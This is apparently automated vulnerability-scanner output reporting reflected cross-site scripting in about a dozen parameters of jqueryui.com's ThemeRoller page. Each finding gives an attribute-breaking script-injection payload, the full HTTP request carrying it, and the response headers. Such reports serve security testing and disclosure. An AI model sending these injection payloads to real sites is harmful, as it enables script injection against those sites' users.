The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 717a0"><script>alert(1)</script>8ae54f49d58 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba717a0"><script>alert(1)</script>8ae54f49d58&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34db"><script>alert(1)</script>974427909eb was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa34db"><script>alert(1)</script>974427909eb&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d610a"><script>alert(1)</script>664987fb5fe was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CFd610a"><script>alert(1)</script>664987fb5fe&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c1c"><script>alert(1)</script>8b71ac69cdd was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e97c1c"><script>alert(1)</script>8b71ac69cdd&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4924"><script>alert(1)</script>b7e5d296fe2 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666e4924"><script>alert(1)</script>b7e5d296fe2&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb0c1"><script>alert(1)</script>2173eee1a85 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5pxbb0c1"><script>alert(1)</script>2173eee1a85&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e67ff"><script>alert(1)</script>d6da6a382c8 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxe67ff"><script>alert(1)</script>d6da6a382c8 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f82b"><script>alert(1)</script>9800a832c8e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=3636367f82b"><script>alert(1)</script>9800a832c8e&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c309"><script>alert(1)</script>9ef676458d7 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=2222227c309"><script>alert(1)</script>9ef676458d7&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5c6"><script>alert(1)</script>4bb9610b710 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000ff5c6"><script>alert(1)</script>4bb9610b710&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf44"><script>alert(1)</script>c36131bd0f6 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acaf44"><script>alert(1)</script>c36131bd0f6&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a923"><script>alert(1)</script>0d310ed75a9 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff7a923"><script>alert(1)</script>0d310ed75a9&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b78"><script>alert(1)</script>878fe90d931 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636f5b78"><script>alert(1)</script>878fe90d931&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
